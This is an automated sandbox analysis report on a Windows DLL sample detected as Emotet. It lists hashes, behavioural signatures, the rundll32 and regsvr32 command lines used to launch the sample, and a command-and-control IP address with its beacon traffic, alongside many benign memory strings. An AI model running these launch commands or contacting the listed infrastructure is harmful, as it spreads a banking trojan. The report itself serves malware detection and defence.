Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TSvDnT6fkE.dll

Overview

General Information

Sample Name:TSvDnT6fkE.dll
Analysis ID:626488
MD5:81fbd732b50a5593d32234e232d59ece
SHA1:4e0d8774739060edf16cb1956934840bc8e9a55a
SHA256:6aaf58cdff2d8c1a9f8ca6caaa1445d2574dcec8b25ef57c050ce3e688e06b5d
Tags:exetrojan
Infos:

Detection

Emotet
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Changes security center settings (notifications, updates, antivirus, firewall)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 6092 cmdline: loaddll64.exe "C:\Users\user\Desktop\TSvDnT6fkE.dll" MD5: 4E8A40CAD6CCC047914E3A7830A2D8AA)
    • cmd.exe (PID: 2920 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\TSvDnT6fkE.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 5840 cmdline: rundll32.exe "C:\Users\user\Desktop\TSvDnT6fkE.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
    • regsvr32.exe (PID: 5764 cmdline: regsvr32.exe /s C:\Users\user\Desktop\TSvDnT6fkE.dll MD5: D78B75FC68247E8A63ACBA846182740E)
      • regsvr32.exe (PID: 3900 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\LqleYRChPKuppQ\QMAA.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
    • rundll32.exe (PID: 6140 cmdline: rundll32.exe C:\Users\user\Desktop\TSvDnT6fkE.dll,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 5860 cmdline: rundll32.exe C:\Users\user\Desktop\TSvDnT6fkE.dll,DllUnregisterServer MD5: 73C519F050C20580F8A62C849D49215A)
  • svchost.exe (PID: 1508 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5724 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3104 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4864 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6080 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 2916 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6640 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 6652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 5764 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3892 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6424 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6744 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5140 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1152 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000002.286004356.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000003.00000002.282888482.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000006.00000002.665179652.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000006.00000002.664928171.00000000006E0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000004.00000002.284149988.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            2.2.regsvr32.exe.eb0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              3.2.rundll32.exe.1bf264f0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                6.2.regsvr32.exe.6e0000.1.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  3.2.rundll32.exe.1bf264f0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    4.2.rundll32.exe.26c83780000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 3 entries
                      No Sigma rule has matched
                      No Snort rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: TSvDnT6fkE.dllVirustotal: Detection: 33%Perma Link
                      Source: https://23.239.0.12/KAvira URL Cloud: Label: malware
                      Source: https://23.239.0.12/0Avira URL Cloud: Label: malware
                      Source: unknownHTTPS traffic detected: 23.239.0.12:443 -> 192.168.2.4:49768 version: TLS 1.2
                      Source: TSvDnT6fkE.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: msacm32.pdb source: regsvr32.exe, 00000006.00000002.663841295.0000000000475000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: msacm32.pdbGCTL source: regsvr32.exe, 00000006.00000002.663841295.0000000000475000.00000004.00000010.00020000.00000000.sdmp
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000D26C FindFirstFileW,FindNextFileW,FindClose,

                      Networking

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 23.239.0.12 443
                      Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: QRIFweiGKVI=h7VegJdmf4xfFFY0QYrxZdstx2kYWXdTstAUTv1fb+WsjLhO8tel9R7uFuWFo2xXJHDd3gjQ6kH0iMy9uU8gc4ZYIxUoNhr5xDSF6nCBjAWyOhB4Utfg5CPFQewAuYEt9x47MOitgo8o4jp+h4lcVMyxOmpNT6WAdcmNzkO1ggkYOdyn6AMcQmNQd52VrPXXGfml0S5M/DuKlS9S14SJSjRbstms/WbaagCawUx6mENt/agbYDUjWaaNo2J5C70=Host: 23.239.0.12Connection: Keep-AliveCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 23.239.0.12 23.239.0.12
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: svchost.exe, 0000001D.00000003.571861000.0000022906570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.facebook.com (Facebook)
                      Source: svchost.exe, 0000001D.00000003.571861000.0000022906570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.twitter.com (Twitter)
                      Source: svchost.exe, 0000001D.00000003.571861000.0000022906570000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.572644636.0000022906581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: svchost.exe, 0000001D.00000003.571861000.0000022906570000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.572644636.0000022906581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: regsvr32.exe, 00000006.00000003.360603406.000000000055D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.664774376.000000000055D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.604874502.000002976E465000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.622340830.0000022906500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 0000000F.00000002.604874502.000002976E465000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.622169830.0000022905CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: svchost.exe, 0000001D.00000003.594537232.00000229065A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.594593800.0000022906586000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: svchost.exe, 0000000F.00000002.604533057.0000029768EB1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.603717973.0000029768EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                      Source: svchost.exe, 0000000A.00000002.317604336.000001E560613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
                      Source: svchost.exe, 00000008.00000002.664253267.000001F55C43E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                      Source: svchost.exe, 00000008.00000002.664253267.000001F55C43E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
                      Source: regsvr32.exe, 00000006.00000002.664157584.0000000000501000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.360723136.000000000052E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.664545621.000000000052E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://23.239.0.12/
                      Source: regsvr32.exe, 00000006.00000003.360644901.0000000000501000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.664157584.0000000000501000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://23.239.0.12/0
                      Source: regsvr32.exe, 00000006.00000003.360680012.000000000052B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.360644901.0000000000501000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.360723136.000000000052E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.664545621.000000000052E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://23.239.0.12/K
                      Source: svchost.exe, 00000008.00000002.664253267.000001F55C43E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
                      Source: svchost.exe, 0000000A.00000003.317134362.000001E560651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: svchost.exe, 00000008.00000002.664253267.000001F55C43E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 00000008.00000002.664253267.000001F55C43E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000A.00000003.317155113.000001E56064A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.317619964.000001E560629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000A.00000002.317649151.000001E56064C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.317155113.000001E56064A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000A.00000003.317134362.000001E560651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 0000000A.00000002.317636438.000001E56063E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 0000000A.00000002.317649151.000001E56064C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.317155113.000001E56064A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 0000000A.00000002.317716036.000001E56066B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.317124892.000001E560668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                      Source: svchost.exe, 0000000A.00000003.317134362.000001E560651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000A.00000003.295352509.000001E560630000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.317619964.000001E560629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000A.00000002.317649151.000001E56064C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.317155113.000001E56064A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000A.00000003.295352509.000001E560630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 0000000A.00000002.317636438.000001E56063E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                      Source: svchost.exe, 0000000A.00000003.317134362.000001E560651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 0000000A.00000003.317134362.000001E560651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 0000000A.00000003.317134362.000001E560651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 0000000A.00000002.317619964.000001E560629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 0000000A.00000003.317169399.000001E560641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.317190582.000001E560642000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.317643661.000001E560643000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 0000000A.00000003.295352509.000001E560630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Stops/
                      Source: svchost.exe, 0000000A.00000003.317169399.000001E560641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.317190582.000001E560642000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.317643661.000001E560643000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                      Source: svchost.exe, 0000000A.00000003.317134362.000001E560651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000A.00000002.317649151.000001E56064C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.317169399.000001E560641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.317155113.000001E56064A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 0000000A.00000003.295352509.000001E560630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=
                      Source: svchost.exe, 0000001D.00000003.594537232.00000229065A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.594593800.0000022906586000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disneyplus.com/legal.
